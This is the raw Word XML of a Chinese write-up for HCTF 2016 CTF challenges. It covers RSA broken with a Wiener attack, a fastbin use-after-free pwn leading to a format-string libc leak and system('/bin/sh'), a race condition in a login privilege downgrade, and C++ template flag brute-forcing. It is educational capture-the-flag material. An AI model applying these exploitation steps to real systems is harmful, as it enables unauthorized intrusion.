        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>file_get_contents</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>flag: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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3042AB6C" wp14:editId="08B71CC4">
            <wp:extent cx="5274310" cy="29845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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc468128532"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>0c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>Crypto So Interesting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>[]~(￣▽￣)~* 115.159.191.193 12000</w:t>
      </w:r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hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://139.224.54.27/03c880e4aaa75efb2200c22e5dcd996d/rsa1.py</w:t>
        </w:r>
      </w:hyperlink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问题出在get_ed函数中，函数生成了e,d ，然而根据代码可以看到除了e、d以外还生成了t、u，与n也可组成一对公私钥，e可以推出t，t和n满足维纳攻击的条件，可以算出u，然后根据u算出phi_n，继而算出d，解密出flag。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3209925" cy="41719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55B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3562350" cy="762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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc468128533"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0d </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>就是干</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>要啥背景，就是怼 115.28.78.54 80</w:t>
      </w:r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  <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://139.224.54.27/fafafafafafa/</w:t>
        </w:r>
      </w:hyperlink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漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：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ab/>
        <w:t>这是一个UAF漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>题目功能有开辟和删除堆块的功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。内存会维持一个堆管理结构，其中有一个8位的字段，用于表示该堆块是否被释放。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B67F96" w:rsidRPr="00764553" w:rsidRDefault="00B67F96" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left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lastRenderedPageBreak/>
        <w:t>然而在删除堆块的时候</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，本应该首先检查该字段判断该堆块是否被释放。但检查条件并不是指向该字段，所以导致检查失效，可以导致UAF。</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32D51DB4" wp14:editId="34E14288">
            <wp:extent cx="5274310" cy="21367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96" w:rsidRPr="00764553" w:rsidRDefault="00B67F96" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B67F96" w:rsidRPr="00764553" w:rsidRDefault="00B67F96" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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利用思路</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B67F96" w:rsidRPr="00764553" w:rsidRDefault="00B67F96" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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ab/>
        <w:t>在此利用fast</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bin来进行堆的利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，因此涉及到的堆块都要小于128字节。首先输入3次小于15字节的字符串，申请3块堆空间。此时内存如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B67F96" w:rsidRPr="00764553" w:rsidRDefault="00B67F96" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left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a b c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B67F96" w:rsidRPr="00764553" w:rsidRDefault="00B67F96" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left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然后</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>着一</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>释放这</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3块，此时3块内存就加入到了fast-bin链表中，c</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-&gt;b-&gt;a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B67F96" w:rsidRPr="00764553" w:rsidRDefault="00B67F96" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left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然后我们输入一个大于</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>15字节的字符串，此时按照程序逻辑，需要申请两块内存（内存1中存储内存2的地址，而我们输入的字符串存放在内存2中。）自然的内存1分配到c地址，内存2分配到b地址，所以b地址就是我们可控的了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B67F96" w:rsidRPr="00764553" w:rsidRDefault="00B67F96" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left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此时释放第二块，因为第二块此时还指向b地址，所以释放时会调用*(b</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>+(*Qword)4)内存储的函数地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>而这个地址早已经被我们覆写</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在此就控</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>制了eip</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B67F96" w:rsidRPr="00764553" w:rsidRDefault="00B67F96" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left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接着我将eip控制到执行printf(‘%175</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>$p</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>’)</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>__libc_start_main+</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>240</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>地址，计算得到system地址。然后在此循环之前操作，再次触发漏洞，执行system</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(‘/bin/sh)即可</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00E14965" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc468128534"/>
      <w:r w:rsidRPr="00764553">
        <w:t>==========</w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:t>==========</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc468128535"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>0e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>48小时如何快速精通C++</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>别想了，那怎么可能？编译环境：vs2015,g++4.7及以上。在题目第二行中输入flag，编译运行</w:t>
      </w:r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hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://139.224.54.27/mastercpp/main.cpp</w:t>
        </w:r>
      </w:hyperlink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C++源码解密题，给了一份一大堆template的校验</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>flag的代码，按它原本的逻辑改写成正常的C代码。看一下校验方式，flag长度必须为26位，前5个字符，最后一个字符，和中间20个字符分别用不同逻辑做了校验。猜一下flag应该是hctf{</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>xxxxxxxxxxxxxxxxxxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}这样的，中间20位是递归按位校验的，忽略逻辑直接按位爆破，附爆破代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA455B" w:rsidRPr="00764553" w:rsidRDefault="00DA455B" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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object w:dxaOrig="1520" w:dyaOrig="10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4pt;height:53.2pt" o:ole="">
            <v:imagedata r:id="rId32" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1029" DrawAspect="Icon" ObjectID="_1541871203" r:id="rId33"/>
        </w:objec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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc468128536"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0f </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>必须比香港记者还要快</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r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hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://changelog.hctf.io/</w:t>
        </w:r>
      </w:hyperlink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有个README.MD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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F3C60D" wp14:editId="6401BC35">
            <wp:extent cx="5274310" cy="38881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可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>看出后端代码处理逻辑是先给用户高权限然后再降权，竞争这个过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>即可，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>登陆时</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>高权限即可看到flag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登陆</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="319E3524" wp14:editId="1D697189">
            <wp:extent cx="5274310" cy="35598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先把</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>登陆</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>跑起来，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后去</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>注册用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>就可以了，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用户注册成功后可以看到登陆脚本已经拿到flag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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="713544DF" wp14:editId="23A01061">
            <wp:extent cx="5274310" cy="1416147"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12" name="图片 12" descr="F:\CTF\HCTF\2016\xiangg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TF\HCTF\2016\xianggang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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc468128537"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>点我点我，我是最正常的逆向题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>把大象放进冰箱需要3步，那么做出一道题目需要几步呢？解题过程有问题请联系管理员</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          </w:rPr>
          <w:t>附件下载</w:t>
        </w:r>
      </w:hyperlink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这道题一点都不想写题解</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
